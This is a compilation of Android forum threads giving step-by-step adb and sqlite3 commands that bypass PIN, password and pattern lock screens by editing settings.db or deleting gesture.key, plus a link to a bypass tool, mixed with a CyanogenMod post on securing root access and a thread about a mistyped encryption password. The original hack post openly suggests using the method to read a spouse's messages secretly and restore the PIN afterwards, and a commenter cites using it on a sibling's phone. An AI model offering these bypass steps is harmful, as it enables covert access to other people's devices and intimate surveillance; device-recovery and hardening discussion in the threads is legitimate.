I thought that I booted in recovery mode since when I turned on the phone, I held Home key then press the power key, but when the phone start up there were only 4 or 5 choices in the recovery menu and except the one "reboot the system now", there were no other choices about reboot. I suspected that to choose "reboot the system now" will cause startup in normal mode. How do you start up the phone in recover mode?
I cannot recall teh color of the text, but I never see any orange text since I had the phone.
Thank you very much for your help. I'm going to get another Gio to unlock.

[Hack] remove a lockscreen pin via adb with sqlite3

There are a couple other ways posted for folks who have forgotten lockscreen password or pattern, but this methods REMOVES the PIN. for pattern and password follow other methods
This method requires root access and debugging enabled.
*if debugging is not enabled it can be done from any custom recovery
-reboot recovery and follow code
PIN
Code:
adb shell
# sqlite3 /data/data/com.android.providers.settings/databases/settings.db
sqlite> update secure set value=65536 where name='lockscreen.password_type';
sqlite> .exit
# exit
adb reboot
step one
Code:
adb shell
make sure you have # in the command prompt/terminal (if not type su)
step two
Code:
sqlite3 /data/data/com.android.providers.settings/databases/settings.db
you will now see sqlite>in command prompt/terminal
step 4
Code:
update secure set value=65536 where name='lockscreen.password_type';
still sqlite>
step 5
Code:
.exit
you will see the # again
step 6
Code:
exit
you will now be in the path/to/adb command prompt/terminal again
step 7
Code:
adb reboot
Enjoy full access to the device
Now lets say you think your wife is cheating on you (which she probably is) and you want to check her sext messages but return the PIN back when you are done.
Code:
adb shell
# sqlite3 /data/data/com.android.providers.settings/databases/settings.db
sqlite> update secure set value=131072 where name='lockscreen.password_type';
sqlite> .exit
# exit
adb reboot
I find this a bit scary, how would you normally prevent ADB or Recovery hacking like this if your device gets stolen?
BrotherG said:
I find this a bit scary, how would you normally prevent ADB or Recovery hacking like this if your device gets stolen?
Click to expand...
Click to collapse
I recommend Avast Anti Theft.
When your device gets stolen, the new owner will take the sim card out and put his in huh?
Well, anti theft sends a pre-entered number a warning that an other SIM is in it. Via sms commands, you can turn GPS on, send the location, block root and stuff.
It wont be deleted as it is a system app
I use it.
Thanks for the job, needed this for hacking my bros phone xD
Greets!
hahaha. .... these Feds could of used this method. They couldnt get past the lockscreen. Great read here.
How a Pimp’s Android Pattern Lock Foiled the Feds
http://gizmodo.com/5893410/how-a-pimps-android-pattern-lock-foiled-the-feds
Looks like CyanogenMod is working on securing ADB
Security and You
March 16th, 2012
jeagoss
1
Many of you may not give it a second glance, but among all the furor and concern about permissions requested by market apps and privacy, all Custom ROMs (CyanogenMod included) ship with one major security risk — root!
We have been struggling with how to handle this for quite a bit, and took a first step with the first public CyanogenMod 9 alpha builds, by disabling the previously-default root access over USB. You can still get adb root access by running “adb root” in terminal, should you ever need it.
We recently merged 3 patches into CyanogenMod 9, to further address this: http://goo.gl/eCjDV http://goo.gl/oWAFI and http://goo.gl/34vai.
What follows is an explanation of the changes, how they affect you and our reasoning behind them.
What do the patches do?
They disable root selectively and in a configurable way. Users will be able to configure their exposure to root as:
Disabled
Enabled for ADB only
Enabled for Apps only
Enabled for both
How does this change affect the usage of your device, and root apps you have installed?
On a default CyanogenMod installation, root usage will have to be explicitly enabled by the user. This means that the user is fully aware that any application that uses root may perform actions that could compromise security, stability and data integrity. Once enabled, the process mirrors that of the current process, apps that request root will be flagged by the SuperUser.apk and the user will have to grant selective access.
Why the change?
At CyanogenMod, security has always been one of our primary concerns, however, we were hesitant to make a change that might disrupt the current root ecosystem. With CyanogenMod 9 we have the opportunity to do things better, whether its the code in the OS, UI/UX, or security – we are taking this time to do things with a fresh approach.
Shipping root enabled by default to 1,000,000+ devices was a gaping hole. With these changes we believe we have reached a compromise that allows enthusiasts to keep using root if they so desire but also provide a good level of security to the majority of users.
What concerns remain?
Many of you reading this are savvy enough to note a remaining hole in this approach – recovery and unlocked bootloaders. The bootloaders are out of our hands, there is little to nothing we can do on that front.
Regarding recovery – with unlocked bootloaders, a malicious user could just flash a new recovery image (without any potential security we could apply) or just dump the data partition. This however, requires physical access to the device. As such, the security standards for this are highly reliant on you, the device owner. Data encryption is available in ICS to safeguard your data. (Warning for emmc only users – encrypted /data means recovery will be non-functional.)
The onus is on you to secure your device; take care of your possessions, and this risk is minimal. Always make sure you take devices out of your car before you go into the mall and remove them from pockets before washing laundry. Common sense is a basic security tool.
But Why?
We honestl
Click to expand...
Click to collapse
Source: http://www.cyanogenmod.com/blog/security-and-you
mDroidd said:
I recommend Avast Anti Theft.
When your device gets stolen, the new owner will take the sim card out and put his in huh?
Well, anti theft sends a pre-entered number a warning that an other SIM is in it. Via sms commands, you can turn GPS on, send the location, block root and stuff.
It wont be deleted as it is a system app
I use it.
Thanks for the job, needed this for hacking my bros phone xD
Greets!
Click to expand...
Click to collapse
All true, if speaking of a casual thief- maybe you left the phone on the bar and someone couldn't resist the temptation. A couple of months ago my wife's phone was recovered in such an occasion- got an sms from Avast Theft Aware with the new number, contacted the rather surprised "honest finder" and he decided to return it back to us.
Anyway, two weeks ago went scubadiving and when returning to the car found the window broken and sure, among other stuff (wallets, scuba gear etc) also both our phones were stolen. However, this time it looks like the thieves were not quick to put their own sim card. Actually, it looks like they've removed the batteries, thrown the sim cards away (the're useless anyway as the carrier blocks the sim).
Since then, no signs whatsoever that the phones have been turned on, sims replaced or that someone has tried to type wrong security pin or whatever- no sms notifications, no emails, no webtracking, nothing.
My guess- the thieves sell them for a small fee (20% of street price?) to some lab or someone who knows "how to deal with it"- do a good wipe (not just factory reset) and remove whatever stuff was installed- system app or not- then put them on market for sale as second hand. Or maybe they just wait with patience a few weeks until you stop looking for it?
So, sometimes these apps like Avast, Cerberus and the such work, sometimes not. Better to keep the phone safe and not rely on it being stolen by a stup!d thief...
On the bright side, one can consider it as an opportunity for upgrade
irst I typed in :
sqlite3 /data/data/com.android.providers.settings/databases/settings.db
However, in spite of what he stated, sqlite>in command prompt doesn't appear.
Instead, I get
/system/bin/sh: sqlite3: not found
how do i set sqlite working?
I'm unable to launch sqlite3 from adb shell
I can manually launch sqlite from the folder but not in cmd
You have to install sqlite3 - https://play.google.com/store/apps/details?id=ptSoft.util.sqlite3forroot&hl=en
Is there a tutorial for a password locked screen too?
Is there another way to bypass the pin code lockscreen? Cus´ I´m always stucking on:
" /sbin/sh: sqlite3: not found "
I have installed sqlite from market
any idea?
whoa, you guys are amazing, this worked like a charm on a password locked tablet
polaroid pmid70c
this is a scary concept if you value your android device consider installing a paid service like dyndns and install the paid version of real vnc onto the device and have ssh setup as well this would help to recover your phone in the event it becomes stolen you could ssh into it launch apps view and control the phone remotely via vnc hell even take pictures ,, turn on gps all sorts of cool things
holm94 said:
Is there another way to bypass the pin code lockscreen? Cus´ I´m always stucking on: " /sbin/sh: sqlite3: not found " I have installed sqlite from market
Click to expand...
Click to collapse
your phone is root enabled? Superuser or SuperSU app installed? Connect USB and run "adb root" and that works?
Try this installer app again https://play.google.com/store/apps/details?id=ptSoft.util.sqlite3forroot&hl=en
I flashed the root feature with SuperSU update zip file in recovery mode, and rebooted.
I grabbed a 'sqlite3' binary made for ARM cpu from the 'net and manually pushed it to my phone's /system/xbin/ directory.
1. unzip this sqlite3 file
2. power on device in custom recovery mode, ('factory mode' also may work, such as in some chinese phones, including my Jiayu)
3. connect USB cable, and in recovery mode, mount the /system directory and any other directorys you will use (see screenshot)
4. open a command prompt (terminal) on computer and run these commands
Code:
[I]adb root[/I]
[I]adb remount[/I]
[I]adb push sqlite3 /system/xbin/sqlite3[/I]
[I]adb shell[/I]
[I]chmod 755 /system/xbin/sqlite3[/I]
[I]sqlite3 -h[/I]
...
exit
adb reboot
* alternate method: if #4 'adb root' does not work, then turn on phone to normal running mode and do:
Code:
adb push sqlite3 /data/local/tmp/sqlite3
adb shell
su
mount -o rw,remount /system
cp /data/local/tmp/sqlite3 /system/xbin/
rm /data/local/tmp/sqlite3
chmod 755 /system/xbin/sqlite3
sqlite3 -h
...
exit
exit
adb reboot
"exit" twice for alternate method.
All this can be done over Wifi instead of USB via a SSH server app.
^_^
I can run all the commands fine, but the PIN lock is still there on my phone after reboot. Android 4.2.1, Jiayu Chinese ROM. So method does not work.
help me, im stuck at " error: device unauthorized. Please check the confirmation dialog on your device."
I know this is super old thread but I used this method and combination with other commands I found on internet to bypass my lockscreen on att samsung galaxy s7 phone I had forgotten pin code on.
I was using fingerprint for a couple of months and rebooted phone for an update and it requires pin code first time before using fingerprint again and I had flat out forgot it. When it got to 1 hour wait between input retrys I searched and found this and other methods. I read no methods work unless rooted.
Luckily and thank God I'm rooted and usb debugging turned on and I have adb installed configured and have used with phone before....thank God. Because pretty much every and anything else on the phone is turned off on phone so I keep off the grid.
I know I'm dragging this out but I want to document and reiterate the value of xda. I will try and remember exactly what I did and may just redo it to be sure and list my exact steps.
One thing, I don't have sqlite3 curser when connecting with adb....I have hero2qltatt or something like that .....I'll get corrected with an edit when I go thru again to make sure.
Also, once I got past lockscreen, when I went into setting/lockscreen&security/ on the phone it still showed pin,fingerprint as security but somehow which still baffles me there was a pick for 'swipe' available....but I still don't know how that happened or how it appeared but I kept trying different pin codes to try to reset that which now there were no limits or time delays but still couldn't remember and then I saw a pick for 'swipe' and that solved it all. I rebooted again to be sure and perfect. Then I went in to recovery and wiped cache and now my phone is back exactly as before.
I wrote down the pin code this time.
Eventually soon I will rerun my steps and document exactly and maybe there is already a more recent account but I found this one first and it pretty much worked....thanks.
OK this is what I used:
adb shell
cd data/system
su
rm *.key

reboot

[GUIDE][HOW-TO]Crack android pattern lock!

Dislcaimer: this is for educational purposes only,you shall not use this on other people phones without permission under any circumstances,and am not responsable to any misuse of this hack
Click to expand...
Click to collapse
ok so not long ago i had a problem with a locked android device with a pattern and i managed to unlock it using adb,so here's how in case you were stuck one day with a locked device.
the device needs to have usb debugging enabled in case usb debugging isn't enabled and you have cwm you can run the same instructions from cwm,root is not required (though it will be so better if the device was rooted)
this was tested on:gingerbread,ice cream sandwich and jelly bean.
both method are through adb.
method 1:
Code:
adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name='lock_pattern_autolock';
update system set value=0 where name='lockscreen.lockedoutpermanently';
.quit
-AND/OR-
method 2:
Code:
adb shell rm /data/system/gesture.key
and that's a video showing how method 2 is done (thanks to melvinchng) : http://www.youtube.com/watch?v=tVJ7T2oC_Zs&feature=player_embedded
you can try both of them,here is how i managed to remove the lock:
1- run the first method.
2-reboot
3-run the second method
4-reboot
NOTES:
-in the first method each line is a seperate command so click enter after typing each line.
-in the second method type all the command and then press enter.
-after running both methods and rebooting you may see the pattern lock,that doesn't necessarily mean it doesn't work,just try any random pattern and it may unlock then remove the pattern from settings.
-this may and may not work,it may work on some devices and don't on others,so all you can do is trying it but i can't assure it will work.
a small donation would be much appreciated thank (check my signature)
But What if i remember the password well enough, but didnt have data enabled the moment it got locked?
Explained elaborately here>>>http://forum.xda-developers.com/showthread.php?p=29963687
It will unlock either (Loook at the time of message above - I am time traveler )
i have better method than bot the above ones
look for smudges on the phone
Do the files need to be restored or are they just the user data for the pattern locks?
This is really great...
i wonder how do you discover this
you must be a hacker
Or you could boot into recovery backup data
wipe factory reset and reboot
Could try restoring data but most likely restore pattern lock
Or simply enter your gmail address as requested
2nd option...
if you have Custom recovery
use AROMA File Explorer and you can do the same thing through the recovery
or adb through the recovery
FWIW, on CM10 neither method works as non-root. Yay CyanogenMod.
Method #1 FAIL:
1|[email protected]:/data/data/com.android.providers.settings/databases $ ll
opendir failed, Permission denied
255|[email protected]:/data/data/com.android.providers.settings/databases $ sqlite3 settings.db
Error: unable to open database "settings.db": unable to open database file
Method #2 FAIL:
[email protected]:/data $ ll /data/system/gesture.key
-rw------- system system 20 2012-08-11 04:51 gesture.key
[email protected]:/data $ rm /data/system/gesture.key
rm failed for /data/system/gesture.key, Permission denied
(I use faceunlock + pattern (mostly to keep my kid outta my phone), but if I actually cared more about security I'd encrypt my phone and use a passphrase instead)
This is a useful guide, thanks, I will try it :good:
So I guess if Debugging wasn't previously enabled, you have no chance to unlock it...
I've noticed a locked Archos tablet in a shop (probably some stupid shopper locked it) and when I saw this thread announced on the first page I was thinking of helping the shop owner. But I guess I cannot.
Have a nice day!
I don't know whether this method can use on neither:
Rooted
Installed Busybox
Rom Version Older or Newer than CM7
This method require ADB Debugging On & A PC & A tool Provided
I found this trick a long time ago
I come for sharing
Click to expand...
Click to collapse
Download the By-pass security Hack.7z
http://www.mediafire.com/download.php?li2686c3jenmen6
Click to expand...
Click to collapse
Primary Step for all method:
Click to expand...
Click to collapse
Extract it to anywhere using 7-zip.
Open SQLite Database Browser 2.0.exe in SQLite Database Browser.
Run pull settings.db.cmd inside By-pass security Hacks folder to pull out the setting file out of your phone.
Drag settings.db and drop to SQLite Database Browser 2.0.exe program.
Navigate to Browse data tab, At table there, click to list down the selection & selete secure
Instruction To Remove Pattern Lock:
Click to expand...
Click to collapse
Now, find lock_pattern_autolock, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone
Instruction To Remove PIN Lock:
Click to expand...
Click to collapse
Now, Find Or Create lockscreen.password_type, double-click & change it's value to 65536, Apply changes!
Now, find lock_pattern_autolock, Delete Record, If doesn't exist, Ignore
Close & save database
Run push settings.db.cmd and reboot your phone
Instruction To Remove Password Lock:
Click to expand...
Click to collapse
Now, find lockscreen.password_salt, Delete Record
Now, find lockscreen.password_type, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone
hmmm i hope those thief's don't find these thread lol
zmore said:
FWIW, on CM10 neither method works as non-root. Yay CyanogenMod.
Click to expand...
Click to collapse
Nor does either method work on unrooted Galaxy Nexus with stock Jelly Bean. Yay stock Android.
mixtapes08 said:
hmmm i hope those thief's don't find these thread lol
Click to expand...
Click to collapse
don't leave usb debugging checked on then.
I advise you guys to also post your Android version. My opinion is that the security hole that permits this hack has been removed in JellyBean, maybe even in an earlier version.
I will try it too a little later, just for the fun's sake.
aussiebum said:
don't leave usb debugging checked on then.
Click to expand...
Click to collapse
If you have forgotten to leave USB debugging enabled, reboot your phone into recovery and do the same. No USB debugging required.
You may however need to mount the partition being accessed by this method, and you can do that only if you have a custom recovery installed (which you more-than-likely have, since you're here on XDA). Just go to 'Mounts and Storage' and mount /data. Then use the method just the normal way. Cheers!
Useful guide for sure. Will keep this as reference!
Does this only work for the pattern unlock or will it also work on the password or the PIN unlock screen?
I can confirm that it is working on a CM7.2 Motorola Defy.
Thanks m.sabra!

Messed up with 'vdc cryptfs changepw password' and entered hex values I can't type.

TL;DR I need an answer to one of the four questions at the bottom.
Preferably #1 or #3.
---------------------------------------------------------------
I have a Oneplus 3T running the latest Resurrectionremix (7.1.1) and TWRP recovery (3.0.4-1).
I use a pattern lock and device encryption, but I had separate passwords for the pattern and the encryption.
I tried to change my encryption password back to my pattern combo using 'vdc cryptfs changepw password' and entering numbers that correspond to the dots of the pattern. (E.g. in a 3x3, the dots are labeled 1-9)
Let's say the password I entered was '123456789'
I didn't realize that I needed to enter the HEX values in this command, (313233343536373839) so I just entered the ASCII values (123456789). The password I entered was all numbers so it corresponded to HEX values without giving an error.
Now, when I restart my phone, or boot into TWRP, I cannot enter the password I set. I cannot access adb or a terminal when booting android, and I cannot use 'vdc cryptfs' through TWRP. (I can use adb and terminal through TWRP)
The obvious solution is to convert the HEX values I entered to ASCII values and type them in, but I have two problems:
I use an odd number of dots for my pattern lock, and I entered an odd number of numbers for the HEX password. I don't know how that would break down into ASCII, because you need 2 HEX digits per ASCII character.
No matter how I convert the HEX to ASCII (either by prepending or appending a 0) there are characters that cannot be typed on a keyboard, and cannot be pasted into an adb shell.
---------------------------------------------------------------
I can think of a number of possible solutions to this problem:
How can I input my encryption password in hexadecimal rather than ASCII?
I think this would only be possible through TWRP/adb. It only needs to be temporary; I'll move my data out and format everything.
How can I backup the encrypted '/data' partition to my PC?
This way, I can freely format my phone while I try to decrypt the encrypted blob. Additionally, are there tools to help me decrypt the partition on a PC?
How can I use 'vdc cryptfs' in TWRP?
Right now, the problem is that it cannot find 'cryptd'. If I can get this to work, I can reset the password to something typeable.
How can I use 'vdc cryptfs' in Android without entering a password on boot?
As I said, my phone doesn't turn on adb before I enter the password, and I can't access Terminal or anything... or is there a way?
Or can I solve this any other way, without losing my data?
Alternatively, is there a way to inject hex into android's clipboard, and paste it during boot or in TWRP?

Categories

Resources